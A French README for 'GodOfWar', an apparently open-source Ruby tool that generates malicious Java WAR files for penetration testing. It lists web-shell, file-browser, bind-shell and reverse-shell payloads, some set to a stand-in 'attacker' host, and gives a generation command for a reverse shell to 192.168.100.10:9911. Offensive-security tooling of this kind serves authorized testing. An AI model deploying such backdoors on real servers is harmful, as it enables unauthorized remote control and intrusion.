
GodOfWar - Constructeur de fichiers WAR Java malveillant avec charges utiles intégrées
Un outil en ligne de commande pour générer des charges utiles (payloads) WAR à des fins de tests d'intrusion / red team, écrit en Ruby.
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - Générateur de WAR Java malveillant.
-l/--list)
--host/--port)$ gem install godofwar
$ godofwar -h
Menu d'aide :
-p, --payload PAYLOAD Génère un WAR à partir de l'une des charges utiles disponibles.
(consultez -l/--list)
-H, --host IP_ADDR Adresse IP locale ou distante pour la charge utile choisie
(utilisé avec -p/--payload)
-P, --port PORT Port local ou distant pour la charge utile choisie
(utilisé avec -p/--payload)
-o, --output [FICHIER] Fichier de sortie et nom de déploiement.
(par défaut, le nom original de la charge utile. consultez '-l/--list')
-l, --list Liste toutes les charges utiles disponibles.
-h, --help Affiche ce message d'aide.
Lister toutes les charges utiles
$ godofwar -l
├── cmd_get
│ └── Informations :
│ ├── Description : Exécution de commandes via interface web
│ ├── OS : quelconque
│ ├── Paramètres : {"false"=>"Aucun paramètre requis !"}
│ ├── Utilisation : http://host/cmd.jsp?cmd=whoami
│ ├── Références : ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Informations :
│ ├── Description : Navigateur de fichiers distant, téléchargement, upload, décompression de fichiers et exécution de commandes natives
│ ├── OS : quelconque
│ ├── Paramètres : {"false"=>"Aucun paramètre requis !"}
│ ├── Utilisation : http://host/filebrowser.jsp
│ ├── Références : ["http://www.vonloesch.de/filebrowser.html"]
│ └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Informations :
│ ├── Description : Shell TCP lié (bind shell)
│ ├── OS : quelconque
│ ├── Paramètres : {"port"=>4444, "false"=>"Aucun paramètre requis !"}
│ ├── Utilisation : http://host/reverse-shell.jsp
│ ├── Références : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Informations :
│ ├── Description : Shell inverse TCP avec un formulaire HTML pour définir LHOST et LPORT depuis le navigateur.
│ ├── OS : quelconque
│ ├── Paramètres : {"host"=>"attacker", "port"=>4444, "false"=>"Aucun paramètre requis !"}
│ ├── Utilisation : http://host/reverse_shell_ui.jsp
│ ├── Références : []
│ └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Informations :
│ ├── Description : Shell inverse TCP. LHOST et LPORT sont codés en dur
│ ├── OS : quelconque
│ ├── Paramètres : {"host"=>"attacker", "port"=>4444, "false"=>"Aucun paramètre requis !"}
│ ├── Utilisation : http://host/reverse_shell.jsp
│ ├── Références : []
│ └── Chemin local : /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Générer une charge utile avec LHOST et LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
Après déploiement, vous pouvez accéder à votre shell sur (http://host:8080/puppy/puppy.jsp)
Pour contribuer en ajoutant d'autres portes dérobées :
payloads.jsp dans le dossier nouvellement créé (nommez-le du même nom que le dossier).payloads_info.json avec :
La gemme est disponible en open source selon les termes de la licence MIT.